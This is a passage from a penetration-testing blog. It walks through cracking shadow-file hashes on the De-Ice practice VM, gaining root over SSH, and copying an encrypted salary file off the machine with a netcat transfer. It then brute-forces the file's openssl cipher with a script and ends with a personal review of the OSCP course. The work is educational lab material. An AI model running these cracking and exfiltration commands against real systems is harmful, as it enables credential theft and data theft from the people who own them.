So now we have the hashes for the users on the system, we can use a widely used program called John the Ripper to try and crack them.

Before we start you might be thinking: what’s a hash? A hash is the output of a one-way function. You take an input value, push it through a hashing algorithm, and out comes a value that should be irreversible. Password hashes are cracked by taking possible passwords, pushing them through the same algorithm, and seeing if the hash generated matches the hash you are trying to crack.
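To make that concrete, here is a toy version of the cracking loop using openssl’s md5crypt implementation (the same $1$ scheme as the hashes in the shadow file). The salt and the candidate list here are made up for the demonstration:

```shell
#!/bin/sh
# Toy cracking loop: hash each guess with the same algorithm and salt
# as the target hash, and compare. openssl passwd -1 produces
# md5crypt ($1$...) hashes.
salt=TOi0HE5n
target=$(openssl passwd -1 -salt "$salt" tarot)   # stands in for a stolen hash

cracked=""
for guess in password letmein qwerty tarot; do
    if [ "$(openssl passwd -1 -salt "$salt" "$guess")" = "$target" ]; then
        cracked=$guess
        break
    fi
done
echo "cracked: $cracked"
```

John does essentially this, just with clever candidate generation and at a vastly higher speed.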

Firstly let’s prepare by making a file containing the hashes we wish to crack. To do this we can use an inline technique that can also be used to transfer files easily from your machine into your target shell.

root@kali ~$ cat > hashes.txt
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
^D

This form of the cat command creates a new file called hashes.txt. Everything typed afterwards becomes the contents of the file. The ^D is not typed literally, but represents pressing CTRL+D, which closes the file that has been open for writing.
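If you would rather not rely on CTRL+D, a here-document achieves the same thing and pastes cleanly into scripts. Note the quoted 'EOF', which stops the shell from expanding the $1$… parts of the hashes:

```shell
# Write the stolen hashes to a file. Quoting the delimiter ('EOF')
# prevents the shell from treating $1, $TOi0HE5n etc. as variables.
cat > hashes.txt << 'EOF'
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
EOF
wc -l hashes.txt
```

The wc at the end is just a sanity check that both lines made it into the file.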

Now that our hashes are in a file locally let’s run john to try and crack them. You might be thinking “Hey! We know two of these already?” We are going to leave them in there for some practice!

The first command we are going to use is john’s single mode. This mode loads the rules from the Single rule set in john’s configuration file. You can look at these if you want to, but understanding them is out of the scope of this particular article. If you want to check it out you can find the file at /etc/john/john.conf. Simply put, this mode attempts to guess hashed passwords by applying simple and common rules.

It’s worth mentioning that john is able to interpret shadow files in their raw format. Hash type detection and the use of user names in the system are done dynamically by john. Other password cracking tools are not so friendly so it’s worth being aware that you may need to extract each hash from shadow files and other hash dumps when using other tools.
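For tools that want the bare hashes, a quick awk sketch pulls user:hash pairs out of shadow-format lines (the sample line is one of the hashes lifted earlier; the filter for "*" and "!" skips locked accounts):

```shell
# Extract user:hash pairs from a shadow-style line. Fields are
# colon-separated; field 1 is the user, field 2 is the hash.
pair=$(echo 'aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::' |
    awk -F: '$2 != "*" && $2 != "!" { print $1 ":" $2 }')
echo "$pair"
```

Running the same awk over a whole shadow file gives you input suitable for most hash crackers.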

root@kali ~$ john -single -pot:deice.pot hashes.txt                                                                             
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
bbanter          (bbanter)
guesses: 1  time: 0:00:00:00 DONE (Thu Aug 15 11:38:46 2013)  c/s: 24122  trying: root1907 - root1900
Use the "--show" option to display all of the cracked passwords reliably

As you can see john quickly cracked bbanter’s password as it was the same as their user name. Here’s a quick breakdown of the command:

  • -single – enable simple rule set for guessing passwords
  • -pot:deice.pot – A pot file is the jargon used for a file containing cracked passwords. The contents are usually stored as hash:password. This file will hold our cracked passwords for this exercise
  • hashes.txt – the file of un-cracked passwords we made earlier

The -single option only goes so far. It will not be able to generate the more meaningful passwords that some users use. This is where we use the rockyou.txt word list once again to try and crack the remaining hashes.

root@kali ~$ john -wordlist:/usr/share/wordlists/rockyou.txt -pot:deice.pot hashes.txt                                          
Loaded 4 password hashes with 4 different salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
Remaining 3 password hashes with 3 different salts
nostradamus      (aadams)
tarot            (root)
hierophant       (ccoffee)
guesses: 3  time: 0:00:01:09 DONE (Thu Aug 15 11:55:59 2013)  c/s: 29217  trying: hieuloan - hieper
Use the "--show" option to display all of the cracked passwords reliably

The only parameter that has changed is -wordlist:/usr/share/wordlists/rockyou.txt (swapped in for -single). It points to the word list to be used and enables the word list attack mode.

So we now have passwords for all the users on the system! Is that it? Well, no! Having root access is great, but it doesn’t mean anything to a company that you might be testing. They will want to be told something a bit less technical, like: “I was able to compromise your server and gain access to confidential files.” So, let’s try and do that!

Hunting for Treasure

Let’s try and log into the root account over SSH. SSH is commonly configured so that root cannot log in remotely, but let’s confirm that.
root@kali ~$ ssh root@                                                                                                        
root@'s password: 
Permission denied, please try again.
root@'s password: 
Permission denied, please try again.
root@'s password: 
Permission denied (publickey,password,keyboard-interactive).

As we can see it doesn’t seem to want to let us in that way, but it doesn’t matter, we can use the switch user command (su) on aadams to get to root:

root@kali ~$ ssh aadams@                                                                                               255 ↵  
aadams@'s password: 
Linux 2.6.16.
aadams@slax:~$ su root
Password: *****

So we are now running as root and have the run of the entire system. So let’s hunt around for any files that might look interesting.

A good place to start is in the user’s (and root’s) home directories. It is a common place for storing files and the most likely place to find something interesting. Let’s run the following commands:

root@slax:/home/aadams# ls -lsaRhS /root/
root@slax:/home/aadams# ls -lsaRhS /home/

Here we are making use of the ls command (the equivalent of dir in Windows) to list the contents of these directories. The options used mean:

  • l – show the results in a list format which displays permissions and ownership
  • s – display the size of the file
  • a – display all files and directories, including hidden files and folders (files and folders starting with a .)
  • R – go through all folders recursively and list their contents too
  • h – make the file sizes human readable rather than in block format (4KB, 2GB etc)
  • S – sort by file size

I’m not going to paste the entire outputs of both commands due to size, but the following excerpt from enumerating the /home/ directory should show something interesting:

total 140K
140K -r-xr-xr-x 1 root root 130K Jun 29  2007 salary_dec2003.csv.enc
   0 dr-xr-xr-x 2 root root   80 Jun 29  2007 .
   0 drwx------ 3 root root   60 Jun 29  2007 ..

What’s this? An encrypted file? It is likely that this is the sort of treasure we are looking for. Let’s use netcat to transfer the file off of the machine. To do this we need to create a listener on our machine and pipe the incoming traffic into a file:

root@kali ~$ nc -lvvp 4444 > salary_dec2003.csv.enc

A quick run down of this command:

  • l – State that we are going to be listening
  • vv – Show extra verbosity
  • p – We are going to supply a port for listening
  • 4444 – This is the port we will be listening on

Back on the ssh session of the target machine we are going to transfer the file through netcat to the listening port on our local machine:

root@slax:/home/aadams# cd /home/ftp/incoming/
root@slax:/home/ftp/incoming# nc -nvv 4444 < salary_dec2003.csv.enc

Be aware that netcat will not tell you when the file has finished transferring. It is a good idea to open another shell and run ls -ls salary_dec2003.csv.enc to check when the file has stopped increasing in size. Here is the output from both of the netcat commands:
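Rather than eyeballing the file size, you can also compare checksums on both ends once the transfer looks done. A local simulation of the idea (cp stands in for the netcat transfer; paths are throwaway):

```shell
# Checksum the file before sending and after receiving; matching
# digests mean the transfer completed intact.
printf 'pretend this is the encrypted file' > /tmp/demo.enc
cp /tmp/demo.enc /tmp/demo_received.enc       # nc would do this in reality
before=$(md5sum /tmp/demo.enc | cut -d' ' -f1)
after=$(md5sum /tmp/demo_received.enc | cut -d' ' -f1)
[ "$before" = "$after" ] && echo "transfer verified"
```

On the real boxes you would run md5sum on each side and compare the two digests by eye.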

On target system:

root@slax:/home/aadams# cd /home/ftp/incoming/
root@slax:/home/ftp/incoming# nc -nvv 4444 < salary_dec2003.csv.enc 
(UNKNOWN) [] 4444 (krb524) open
 sent 133056, rcvd 0

On local system:

root@kali ~$ nc -lvvp 4444 > salary_dec2003.csv.enc                                                                             
listening on [any] 4444 ... inverse host lookup failed: Unknown server error : Connection timed out
connect to [] from (UNKNOWN) [] 45972
 sent 0, rcvd 133056

Great, we have the file. Let’s check that it is actually an encrypted file. We can use the file command on Linux to try and identify it.

root@kali ~$ file salary_dec2003.csv.enc
salary_dec2003.csv.enc: data 

It says the file is data; well, that’s no good, we’ll need to dig a bit deeper. Using strings and head we can get the string representation of the file, taking just the top of the file for inspection. This is a great way to check obscure file types and analyse them for identification.

root@kali ~$ strings salary_dec2003.csv.enc | head

After googling the Salted__ header that appears at the top of the strings output, it seems that the file was encrypted with openssl, an application that can encrypt and decrypt files. But what algorithm was used to encrypt it? This is where things might get confusing if you’ve never written scripts before. I have created a script that brute forces all the known cipher types offered by the openssl program.
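If you want to see where that marker comes from: when openssl salts its output (the default), it writes the 8-byte magic "Salted__" at the start of the file. A quick demo with a throwaway file and password:

```shell
# Encrypt a scratch file, then read back the first 8 bytes: the
# "Salted__" magic is what identifies openssl-encrypted data.
printf 'secret data' > /tmp/demo.txt
openssl enc -aes-128-cbc -k notthepassword -in /tmp/demo.txt \
    -out /tmp/demo.txt.enc 2>/dev/null
head -c 8 /tmp/demo.txt.enc
```

The magic identifies openssl but, crucially, not the cipher used, which is why brute forcing the cipher list is needed.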

Here is the script I created to assist with this scenario.


#!/bin/bash

# Usage: print help and bail out if no input file was given
if [[ -z $1 ]]; then
    echo 'USAGE: ./ <input file> <output file> <password> [cipher]'
    exit 1
fi

# Arrange variables
INPUTFILE=$1
OUTPUTFILE=$2
PASSWORD=$3
CIPHER=$4

# If a specific cipher is not given then
# get the list of ciphers known to openssl
if [[ -z $CIPHER ]]; then
    CIPHER=`openssl list-cipher-commands`
fi

#echo $CIPHER

# For each cipher type attempt a decryption with the given password
for c in $CIPHER; do
    openssl enc -d -${c} -in ${INPUTFILE} -k ${PASSWORD} > /dev/null 2>&1
    # Check to see if the command didn't fail the decryption
    # If it didn't, alert the user
    if [[ $? -eq 0 ]]; then
        # Print a command for each possible decryption method.
        # The cipher is appended to the output file name so more than
        # one of these commands can be run at the same time.
        echo "openssl enc -d -$c -in $INPUTFILE -out $OUTPUTFILE-$c -k $PASSWORD"
        #exit 0
    fi
done
Let’s put this script on our machine and run it. Wait a minute! What password should we be trying to decrypt with? Well, if you remember the comment next to the root user in the /etc/passwd file, it seems a safe bet that the root user’s password is linked to the FTP service, and since we found the file in the ftp user’s folder it might be a good starting point.


Let’s now copy the script onto our machine; I’m going to do this with nano this time. nano is a simple command line text editor. I will paste the script into this file, then save and quit.

root@kali ~$ nano ./

We now want to run the script; for this to happen we need to give it executable permission. The command line application chmod will do this for us. It’s an important command to understand, so I suggest reading up on it if you’ve never used it before.
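If chmod is new to you, a minimal demonstration of what +x does (the file name here,, is a stand-in for whatever you saved the script as):

```shell
# +x adds the execute bit to the file's permissions, which is what
# lets the shell run it as ./
touch /tmp/
chmod +x /tmp/
[ -x /tmp/ ] && echo "/tmp/ is now executable"
```

chmod can also set permissions numerically (e.g. 755), which is worth reading up on.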

root@kali ~$ chmod +x

Let’s create a folder called results to store the results of the decryption in as there might be false positives to sort through.

root@kali ~$ mkdir results

Now for the brute forcing. The syntax of the script is:

./ <input file> <output file> <password> [specific cipher] 

The script does not write the decrypted file itself; if a decryption succeeds it prints a command which includes the output location. The cipher type is added onto the end of the output file names so they do not overwrite each other. If you want to try a specific cipher you can supply it as the last parameter. Let’s run the command and check the output:

root@kali ~$ ./ salary_dec2003.csv.enc results/salary_dec2003.csv tarot                                          
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-aes-128-cbc -k tarot
openssl enc -d -base64 -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-base64 -k tarot
openssl enc -d -bf-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-bf-cfb -k tarot
openssl enc -d -bf-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-bf-ofb -k tarot
openssl enc -d -cast5-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-cast5-cfb -k tarot
openssl enc -d -cast5-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-cast5-ofb -k tarot
openssl enc -d -des-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-cfb -k tarot
openssl enc -d -des-ede-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede-cfb -k tarot
openssl enc -d -des-ede-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede-ofb -k tarot
openssl enc -d -des-ede3-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede3-cfb -k tarot
openssl enc -d -des-ede3-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede3-ofb -k tarot
openssl enc -d -des-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ofb -k tarot
openssl enc -d -rc2-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc2-cfb -k tarot
openssl enc -d -rc2-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc2-ofb -k tarot
openssl enc -d -rc4 -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc4 -k tarot
openssl enc -d -rc4-40 -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc4-40 -k tarot
openssl enc -d -seed-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-seed-cfb -k tarot
openssl enc -d -seed-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-seed-ofb -k tarot

Looks like there could be lots of false positives! Because we made the results folder earlier we’re good to go and run these commands. We can simply copy and paste them into the shell and they should execute without errors. We now need to identify which is the correct decryption format. A quick bash one liner should help us quickly find out:

root@kali ~$ cd results
root@kali ~/results$ for i in $(ls); do echo $i; grep -i salary $i; done                                                        
,Employee ID,Name,Salary,Tax Status,Federal Allowance (From W-4),State Tax (Percentage),Federal Income Tax (Percentage based on Federal Allowance),Social Security Tax (Percentage),Medicare Tax (Percentage),Total Taxes Withheld (Percentage),"Insurance

What did that one liner do?! If you’re not into programming or scripting the following might look alien, but I encourage you to understand it and try some simple scripts for yourself: they’re incredibly useful! This one liner is a simple for loop. We get the names of all the files in the directory with $(ls) and reference each file name in turn with $i. In each iteration of the loop we echo the file name and use grep to search the file for the string salary. I chose salary as it seems most likely to appear in the file, given that the file is called salary_dec2003.csv. Had this not been the case I could edit the one liner and choose another search term. The output we got was from the first file, using the aes-128-cbc cipher. You can now cat this file and pipe it to less, which gives you a friendlier way to view it.
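Incidentally, grep can do this search on its own: -l prints only the names of matching files and -i ignores case. A demo against a throwaway directory (the paths and contents are illustrative):

```shell
# Build a fake results directory: one junk file and one with the
# CSV header we're looking for, then let grep name the match.
mkdir -p /tmp/results_demo
echo 'binary garbage'  > /tmp/results_demo/rc4
echo 'Name,Salary,Tax' > /tmp/results_demo/aes-128-cbc
grep -il salary /tmp/results_demo/*
```

In the real results folder, `grep -il salary *` would have pointed straight at the correctly decrypted file.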

root@kali ~/results$ cat salary_dec2003.csv | less 

Well there you have it, we have rooted the machine and got some evidence to show for it. This would normally be the end but there is an additional challenge to fix the FTP server.

Bonus points?!

Now now, you don’t have to do this, it’s purely an added extra… I think? I won’t go into too much depth here as I don’t think this part will interest many people. Looking back, we were unable to identify the service version running on port 21. nmap suggested that vsftpd was running but returned an error. Let’s confirm that by searching for ftp configuration files in /etc.

root@slax:~# find /etc -name "*ftp*" -type f

This confirms that vsftpd is running; nmap was correct! Let’s look at the find command used here more closely as it can be handy if you’re looking for specific files.

  • /etc – the directory we want to search in recursively
  • -name "*ftp*" – return everything with ftp in the name (quoted so the shell doesn’t expand it first)
  • -type f – only return results that are files

Let’s google the error that nmap gave us (which can also be seen when attempting an ftp connection to the target IP on port 21). After some googling we find that this error may be caused by the following setting in the /etc/vsftpd.conf file:

# To run vsftpd in standalone mode (rather than through inetd), uncomment
# the line below.

To check whether vsftpd is currently running through inetd we can use netstat and see what is listening on port 21:

root@slax:~# netstat -antp | grep 21
tcp        0      0    *               LISTEN     9511/inetd

There it is: port 21 is being handled by inetd, so we need to edit /etc/vsftpd.conf and change listen=YES to listen=NO. Let’s make that change and attempt to connect to the port manually:

root@kali ~$ ftp
Connected to
220 (vsFTPd 2.0.4)
Name ( root
331 Please specify the password.
230 Login successful.

Hooray it works! Let’s use ls to list the files…

ftp> ls
215 UNIX Type: L8
500 OOPS: vsf_sysutil_recv_peek

Oh dear, something’s still not quite right! Back to google! It seems that a kernel module needs to be loaded for vsftpd to function correctly. Let’s load the module and try connecting again from our machine.

root@slax:~# modprobe capability
root@kali ~/deice10010/results$ ftp                                                                                          
Connected to
220 (vsFTPd 2.0.4)
Name ( root
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx---r-x    2 0        0              63 Jul 20  2006 Desktop
-rw-r--r--    1 0        0             323 May 02  2005 Set IP address
226 Directory send OK.
ftp> cd /home/ftp/incoming
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x    1 0        0          133056 Jun 29  2007 salary_dec2003.csv.enc
226 Directory send OK.
ftp> get salary_dec2003.csv.enc
local: salary_dec2003.csv.enc remote: salary_dec2003.csv.enc
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for salary_dec2003.csv.enc (133056 bytes).
226 File send OK.
133056 bytes received in 0.00 secs (46011.9 kB/s)

After connecting we were able to get a directory listing, change directory to the known ftp location and download the encrypted salary file!


You should now have a good grasp on how to tackle a vulnerable machine. Of course there are many other virtual machines out there that differ from this one, and new types of attacks will have to be learned to overcome their specific obstacles. The most important thing to take away from this machine is the gathering of information. A simple list of users enabled us to get into the whole system! Don’t take shortcuts. Do as much information gathering as possible in the beginning, otherwise you may find yourself going through it all over again! It’s worth mentioning that we didn’t have to do much with the information we found out about the services, but in other challenges this information will be vital to making a successful breach.


Thanks for reading! If you reached this far, well done; it is a very long post and I don’t intend to write one like this for every vulnerable machine I cover. I hope those that read this managed to get to grips with the basic ideas and tools that are used in the penetration testing world.


Thanks to superkojiman for giving me a starting point for the decryption script!

The course

The Penetration Testing with BackTrack (PWB) course is one which covers a lot of topics and genres, will push you to your limits, and make you forget what sleep is. The remote lab covers multiple networks, each with machines varying in difficulty and types of vulnerabilities. I cannot go into too much detail due to the non-disclosure agreement students make with Offensive Security. The best insight as to what is covered in the course can be viewed here in the course syllabus (this is what got me initially interested in the course). Be aware that the lab book will go through a large selection of topics, but independent research will be required. Expect to be surprised in the labs.

To start with, a few quick notes for people that might be reading this.

Le background

Before I start rambling on about my experiences and information about the course, it is worth noting my past experience. Before taking the course my main programming strengths were PHP and Java (guys, don’t shoot me). I had some basic web app exploitation knowledge and some Linux experience.

I was advised to tackle some free systems that have built-in vulnerabilities (listed at the bottom of this post). All of these were Linux based; they were fun to do and gave me deeper insight into service enumeration, web-based attacks and kernel exploitation. I am glad I decided to do these boxes as they gave me a bit of starting knowledge. However, if you are new to this game as I was (and still am), the offsec course will throw a hell of a lot more at you than these machines will.

If you’re new to penetration testing and have similar experience to me then this course may not be for you. I encourage you to read this post as I will attempt to put into perspective the time it takes, and the factors that helped me succeed in the time I did. Believe me when I say that if you’re new, it’s gonna hurt, it’s going to take time, but it’s gonna be fun.

If you’re not new to penetration testing this course may be great as a “refresher” or something to do to get some additional practice. It may even be a case of doing it to get the cert for your resume. If you’re a fully-fledged pen tester you will probably (and hopefully) fly through the course.

Many thanks

I am very lucky to have made a few good friends that have guided and supported me throughout this course. Without them I would not have learnt and grasped as much, and would certainly not have popped as many machines as I did. If you’re one of the people that helped me in this course (and you will know who you are), thank you for teaching me how to fish.

The adventure

I booked the 60 day option for the course, knowing that I would need at least this amount of time to get to grips with the material and make a good start on the labs. I made a point of downloading and looking at the course syllabus to see what I was letting myself in for. Well, to me it looked fun. The course covered a wide range of topics which tickled my fancy.

I took 2 weeks off my job at the time to work through all of the material. I took notes, screenshotted everything and completed near enough all of the exercises. For me, this is the only way for stuff to sink in (plus I wanted to get my money’s worth). I had half hoped I could get through the PDFs and videos quickly, however I found that even after my 2 weeks off work I still had some stuff to do. I put this down to my overly-keen documentation, but I don’t regret this at all. I now have a massive KeepNote file I can reference in the future.

I moved into the lab environment and quickly got to grips with a few of the tools described in the lab book. I started off by looking for the “Low Hanging Fruit”. See port X open, exploit with Y. I soon broke into a few machines using some of the basic exploits and vulnerabilities described in the material. After about a week I had a small collection of machines under my belt, and a lot of information collected.

It was at this point I felt I was tackling the course the wrong way. I started brute forcing my way into servers. I’m not going to let on exactly what I was doing because I don’t want to ruin the course for others. Long story short: I ended up taking “the easy route”. After chatting with a friend I could sense he was either face palming or shaking his head. After a small discussion I took it upon myself to break into the remaining machines (and the ones I had brute forced) through their intended vulnerabilities.

Now I know for a fact that in an actual penetration test, some of the techniques I used to pop boxes so quickly are vital (as time is usually of the essence). However, I did not want to go down this route as, for me at least, more knowledge was to be gained by breaking into machines the hard way. After I cleared my conscience I started popping boxes again, and found that I was getting a lot more satisfaction and “awwww yeah!” moments when getting system/root on servers.

I extended the course by another 30 days so I could attempt to break into all the boxes. I really started picking up the pace at this point, popping at least a machine a day. The course material had finally sunk in after some initial exposure to the labs; things were falling into place where they hadn’t before. I found myself thinking more logically about the problems a tough box presented, going back to basics, and finding the things I had missed. By the time my lab time ran out I had popped the majority of the machines. I also took the time to break into everything again, saving the commands used, their outputs and the screenshots. I did this more for myself so I had something to look back on after the course. It took me a good couple of days, but I don’t regret it at all.


I booked my exam around about a month after my lab time had finished. I relished the time to relax a bit and not have to spend endless hours on the course. Looking back, I think that a month was too long to wait for the exam. I would say two weeks would have sufficed, giving me time to finish writing the lab report and preparing for the exam. In fact, I think the exam would have gone a bit easier as the course material would have been fresh in my head.

The exam lasts for 24 hours. I decided to opt for an afternoon start and prepared myself with a bit of a lie-in. It was probably one of the most intense 24 hours of my life but it was certainly worth it. Within 72 hours of submitting my lab and exam reports I got this in my mailbox:

We are happy to inform you that you have successfully completed your Certification Challenge and obtained your OSCP certification.


Overall I really enjoyed the course. Starting with quite a small amount of knowledge, I managed to gain a great understanding of the basics. Being thrown in at the deep end is a great tool for learning: it forces you to look up the things that don’t work, and at least you learn why they don’t work and gain additional knowledge along the way. New or professional, there is something in this course for everyone. Learn the basics, hone your skills, or get a certification for your resume.

Help and guidance

The #offsec IRC channel on freenode is always active, and there should always be an admin around. You can get some “hints” for a specific machine by typing !machinename in the channel (expect some troll messages too). The forums are also a treasure trove of past posts that can be helpful if you’re stuck on a particular box or lab module.

Course advice

If you get stuck on a box, go back to basics. Enumeration is the key! Look back on the techniques you learnt from the material to fingerprint, banner grab and enumerate services/web applications. Google is your friend! Try to solve things yourself before asking others, especially when the answer is a 10-second Google search away. Finding the solution yourself will also feel better than being handed the answer. Remember, in the real world, if you’re stuck trying to break into a machine on a pen test, who is going to spoon-feed you then? Don’t be too scared/lazy to read things! Try to do things the hard way where possible; the feeling you get is great, and the knowledge gained is worth its weight in gold.
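Banner grabbing, for instance, needs nothing more than a raw TCP connection. A minimal Python sketch of the idea (the local listener and its "SSH-2.0-OpenSSH_5.3" banner are made up purely for the demo; on a lab machine you would point `grab_banner` at the target host and port):

```python
import socket
import threading

def grab_banner(host, port, timeout=3.0):
    """Connect to a TCP service and return whatever it announces first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(1024).decode(errors="replace").strip()

# Throwaway local listener that mimics a chatty service for the demo.
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))          # port 0 = let the OS pick a free port
srv.listen(1)
port = srv.getsockname()[1]

def fake_service():
    conn, _ = srv.accept()
    conn.sendall(b"SSH-2.0-OpenSSH_5.3\r\n")  # illustrative banner only
    conn.close()

t = threading.Thread(target=fake_service)
t.start()
banner = grab_banner("127.0.0.1", port)
t.join()
srv.close()
print(banner)  # SSH-2.0-OpenSSH_5.3
```

The same few lines, aimed at an open port on a lab box, often identify the exact service version — which is usually the first thread to pull on.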

Before taking the course

Check out VulnHub (linked below) or similar sites to get a feel for what the course is going to offer. The machines I played with before starting the course:

  • Kioptrix Level 1
  • Kioptrix Level 2
  • De-Ice Disk 1
  • De-Ice Disk 1.1
  • De-Ice Disk 2.1
  • DVWA (Damn Vulnerable Web App)

I would also suggest the following machines:

  • Metasploitable
  • Metasploitable 2

There are plenty of other free resources on the web; to list a few: